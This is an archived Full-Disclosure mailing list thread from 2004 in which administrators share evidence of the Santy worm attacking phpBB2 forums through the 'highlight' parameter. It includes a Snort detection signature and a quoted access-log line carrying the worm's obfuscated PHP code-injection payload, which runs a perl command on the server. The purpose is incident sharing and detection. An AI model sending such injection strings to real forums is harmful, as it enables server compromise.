Full Disclosure mailing list archives

RE: Worm hitting PHPbb2 Forums

From: "M. Shirk" <shirkdog_list () hotmail com>
Date: Tue, 21 Dec 2004 19:53:09 -0500

I missed an important "F" on my previous post for these snort sigs.

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGEphpBB Highlighting Code Execution - Santy.A Worm";flow:to_server,established; uricontent:"/viewtopic.php?"; nocase;uricontent:"&highlight='.fwrite(fopen("; nocase;reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999;rev:1;)


Shirkdog
http://www.shirkdog.us

From: "Mike" <mike_sha () shaw ca>
To: <mark () onnow net>, "L. Walker" <lwalker () magi net au>
CC: <incidents () securityfocus com>, <full-disclosure () lists netsys com>
Subject: RE: Worm hitting PHPbb2 Forums
Date: Tue, 21 Dec 2004 13:28:27 -0500

Does this affect PHPBB2 in general, or is it platform specific as well?

Mike Fetherston

> -----Original Message-----
> From: mark () onnow net [mailto:mark () onnow net]
> Sent: Tuesday, December 21, 2004 12:47 PM
> To: L. Walker
> Cc: incidents () securityfocus com; full-disclosure () lists netsys com
> Subject: Re: Worm hitting PHPbb2 Forums
>
> Front what I have read, this can happen in any phpbb version lower
than
> 2.0.11
>
> This exploit is becoming frequent.  Normally uploading a ddos bot.
>
> Mark
>
> Quoting "L. Walker" <lwalker () magi net au>:
>
> > Just spotted two clients hit by this.  One client didnt update his
> > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation
16.
> > Chkrootkit says its Adore, however could be something else.
Datacenter
> > wasn't very smart and has since wiped the server, so no binaries or
> other
> > evidence.
> >
> > Generation 12 only wiped out PHP files, replacing them with its own
> > message on other client's PHPbb2 forum.  Access logs show:
> >
> > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
> >
>
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlig
ht
>
=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252ech
r(
>
32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252ech
r(
>
112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252ec
hr
>
(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252ec
hr
>
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252
ec
>
hr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252
ec
>
hr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%
25
>
2echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%
25
>
2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106
)%
>
252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78
)%
> 252echr(41)%252echr(34))%252e%2527
> > HTTP/1.0" 200 270
> >
>
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5
ac
>
a2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252ech
r(
>
114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252ec
hr
>
(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252
ec
>
hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252e
ch
>
r(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252
ec
>
hr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%25
2e
>
chr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)
%2
>
52echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)
%2
>
52echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(12
2)
>
%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(9
7)
> %252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
> > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> >
> > --
> > L. Walker <lwalker at magi dot net dot au>
> > Network Administrator / Consultant
> > --
> >
>
>
>
>
> ----------------------------------------------------------------
> This message was sent using IMP, the Internet Messaging Program.


_________________________________________________________________

FREE pop-up blocking with the new MSN Toolbar get it now!http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

RE: Worm hitting PHPbb2 Forums David Devault (Dec 21)
- <Possible follow-ups>
- RE: Worm hitting PHPbb2 Forums Christopher Adickes (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mike (Dec 22)
  - RE: Worm hitting PHPbb2 Forums M. Shirk (Dec 21)
  - Re: RE: Worm hitting PHPbb2 Forums Willem Koenings (Dec 22)
    - RE: RE: Worm hitting PHPbb2 Forums Patrick Nolan (Dec 23)
    - RE: RE: Worm hitting PHPbb2 Forums Paul Laudanski (Dec 23)
- Re: Worm hitting PHPbb2 Forums mark (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mattias R. Lindgren (Dec 23)